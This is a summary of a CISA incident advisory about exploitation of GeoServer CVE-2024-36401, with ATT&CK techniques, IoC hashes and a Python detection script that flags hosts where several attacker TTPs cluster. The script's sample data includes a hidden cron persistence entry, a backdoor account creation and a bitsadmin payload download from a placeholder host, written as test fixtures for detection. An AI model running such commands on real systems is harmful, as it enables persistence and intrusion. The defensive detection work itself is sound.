Response to CISA Advisory (AA25-266A): CISA Shares Lessons Learned from an Incident Response Engagement

CISA released an advisory detailing an incident at a U.S. federal civilian executive branch agency in which attackers exploited CVE-2024-36401 in GeoServer to achieve remote code execution, remained undetected for nearly three weeks, and moved laterally. AttackIQ published assessment templates emulating the post-compromise TTPs (Linux and Windows) from CISA AA25-266A to help organizations validate their detection, response, and prevention controls.

Key points

  • CISA’s advisory (AA25-266A) describes a breach where an unpatched GeoServer vulnerability (CVE-2024-36401) allowed unauthenticated RCE and subsequent intrusions on July 11 and July 24, 2024.
  • The vulnerability had been publicly disclosed June 30, 2024, and listed in CISA’s Known Exploited Vulnerabilities catalog on July 15, 2024, but the FCEB agency had not patched it.
  • Attackers operated undetected for nearly three weeks, conducting lateral movement and post-compromise activities across Linux and Windows hosts.
  • CISA emphasizes prompt patching of known exploited vulnerabilities, exercising incident response plans, and implementing centralized, out-of-band logging and continuous monitoring.
  • AttackIQ released Linux and Windows assessment templates that emulate the GeoServer and SQL Server post-compromise TTPs to validate controls for persistence, discovery, and command-and-control behaviors.
  • Linux TTPs in the template include cron persistence, system discovery commands (df, ps aux, uname, ifconfig, who), and delivery of known samples (Stowaway proxy and a 2017 Linux exploit).
  • Windows TTPs include account creation, discovery via netstat, net group and net user, systeminfo, certutil/ping internet checks, tasklist/process discovery, ipconfig, and BITS-based payload retrieval.

MITRE Techniques

  • [T1053.003] Cron Job Persistence and Execution – cron was used to schedule commands for recurring execution (“Cron Job Persistence and Execution (T1053.003): This scenario used the cron utility to schedule commands for initial or recurring execution.”)
  • [T1082] System Information Discovery – commands like df and uname were executed to obtain disk and system information (“Obtain Disk Space using 'df' Command (T1082): This scenario executes df command…”; “Obtain System Information using 'uname' Command (T1082): This scenario executes the uname -a command…”)
  • [T1057] Process Discovery – adversaries enumerated running processes using ps aux / tasklist (“Process Discovery using 'ps aux' Command (T1057): This scenario executes ps -aux command…”; “Process Discovery Through Tasklist (T1057): This scenario enumerates processes…”)
  • [T1087.001] Account Discovery – local accounts were enumerated via cat /etc/passwd and net user (“Account Discovery (T1087.001): This scenario executes the cat /etc/passwd command…”; “Enumerate Local System Accounts via net Command (T1087.001): This scenario executes the net user command…”)
  • [T1016] System Network Configuration Discovery – ifconfig and ipconfig were used to collect network adapter and configuration information (“System Network Configuration Discovery through Linux Command Line (T1016): This scenario executes ifconfig…”; “Get IP Information through Windows Command Line (T1016): This scenario executes the ipconfig /all…”)
  • [T1124] System Time Discovery – date and who -b were used to obtain the system date and last boot time (“Obtain System Date using 'date' Command (T1124): This scenario executes the date command…”; “Obtain Last System Boot using 'who' Command (T1124): This scenario executes the who -b command…”)
  • [T1136.001] Create Account – net user was used to create a new user to maintain access (“Create Account (T1136.001): This scenario attempts to create a new user into the system with the net user Windows command.”)
  • [T1049] System Network Connections Discovery – netstat was used to enumerate active connections and listening services (“System Network Connections Discovery (T1049): This scenario uses the native Windows command line tool netstat…”)
  • [T1087.002] Domain Account Discovery – net group was used to list domain administrator accounts (“Domain Administrator Accounts Discovery Via Net Command Script (T1087.002): This scenario executes net group command…”)
  • [T1033] Account Discovery (whoami) – whoami was executed to obtain the running user account identity (“Obtain Username using 'whoami' Command (T1033): This scenario executes the native whoami command…”)
  • [T1083] File and Directory Discovery – dir was executed to enumerate files and directories (“File and Directory Discovery Script (T1083): This scenario executes the native dir command…”)
  • [T1016.001] Internet Connection Discovery – certutil and ping were used to test Internet connectivity and try downloading files (“Internet Connection Discovery using certutil Command (T1016.001): This scenario executes the certutil utility…”; “Internet Connection Discovery via ping to 8.8.8.8 (T1016.001): This scenario executes ping command…”)
  • [T1197] BITS Jobs – bitsadmin was used to create a BITS job to download a remote payload as a covert C2/data retrieval method (“BITS Jobs Script (T1197): This scenario employs the bitsadmin native command to create a BITS job and configure it to download a remote payload.”)
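As an added illustration (not AttackIQ's or CISA's code), the following Python maps the discovery, persistence, account-creation and BITS commands listed above to their ATT&CK IDs, groups matches per host from constructed process-execution records, and flags hosts where several distinct TTPs cluster, which is the kind of centralized-log detection the advisory calls for. The host names, user names, sample records and rule set are assumptions for this example.

```python
import re
from collections import defaultdict

# One regex per TTP named in the advisory summary, keyed by ATT&CK ID. Rules are tested in
# order and the first match wins, so "net user ... /add" (creation) precedes plain "net user".
RULES = [
    ("T1136.001", re.compile(r"\bnet\s+user\s+\S+.*\s/add\b", re.I)),
    ("T1087.001", re.compile(r"\bnet\s+user\b|\bcat\s+/etc/passwd\b", re.I)),
    ("T1087.002", re.compile(r"\bnet\s+group\b", re.I)),
    ("T1053.003", re.compile(r"\bcrontab\s+-|/etc/cron", re.I)),
    ("T1082", re.compile(r"\bdf\b|\buname\b|\bsysteminfo\b", re.I)),
    ("T1057", re.compile(r"\bps\s+-?aux\b|\btasklist\b", re.I)),
    ("T1016.001", re.compile(r"\bcertutil\b|\bping\b.*\b8\.8\.8\.8\b", re.I)),
    ("T1016", re.compile(r"\bifconfig\b|\bipconfig\b", re.I)),
    ("T1124", re.compile(r"\bdate\b|\bwho\s+-b\b", re.I)),
    ("T1049", re.compile(r"\bnetstat\b", re.I)),
    ("T1033", re.compile(r"\bwhoami\b", re.I)),
    ("T1083", re.compile(r"^\s*dir\b", re.I)),
    ("T1197", re.compile(r"\bbitsadmin\b", re.I)),
]

# Constructed process-execution records (host, user, command line); not real telemetry.
EVENTS = [
    ("geo-srv01", "tomcat", "df -h"),
    ("geo-srv01", "tomcat", "ps aux"),
    ("geo-srv01", "tomcat", "ifconfig"),
    ("geo-srv01", "tomcat", "cat /etc/passwd"),
    ("geo-srv01", "tomcat", "echo '* * * * * /tmp/.x' | crontab -"),
    ("sql-win02", "svc_sql", "net user svc_backup Placeholder1 /add"),
    ("sql-win02", "svc_sql", 'net group "Domain Admins" /domain'),
    ("sql-win02", "svc_sql", "bitsadmin /transfer j http://example.invalid/x C:\\Windows\\Temp\\x"),
    ("build-03", "jenkins", "df -h"),  # a lone disk check on a build box is routine noise
    ("build-03", "jenkins", "git pull"),
]

def classify(cmdline):
    """Return the ATT&CK ID of the first rule matching this command line, else None."""
    return next((tid for tid, pat in RULES if pat.search(cmdline)), None)

def techniques_by_host(events):
    """Collect the set of distinct matched technique IDs observed on each host."""
    seen = defaultdict(set)
    for host, _user, cmdline in events:
        if tid := classify(cmdline):
            seen[host].add(tid)
    return seen

def flag_hosts(events, min_distinct=3):
    """Flag hosts with >= min_distinct different TTPs; one stray 'df' is noise, a cluster is not."""
    return sorted(h for h, t in techniques_by_host(events).items() if len(t) >= min_distinct)
```

Running it over real EDR or auditd process telemetry only requires replacing EVENTS with (host, user, command line) tuples from your own pipeline.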

Indicators of Compromise

  • [File Hash] malicious sample hashes – dff3e75f2f72f8123be76f010d7bd71f5f7508dfac84b2b52a721e779abc50c9 (Stowaway Proxy sample), 42202a67748c6a5eb735e8241ef144462d9323894579a2f063fa2f82c91eca08 (2017 Linux exploit)
  • [CVE] exploited vulnerability – CVE-2024-36401 (GeoServer unauthenticated RCE)
  • [Product/Service] affected software – GeoServer (vulnerable to CVE-2024-36401), SQL Server behaviors emulated in Windows template
  • [Commands/Artifacts] evidence of post-compromise commands – examples include cron entries, df / ps aux / uname / ifconfig outputs, net user / net group / netstat / certutil usage

Read more: https://www.attackiq.com/2025/09/24/response-to-cisa-advisory-aa25-266a/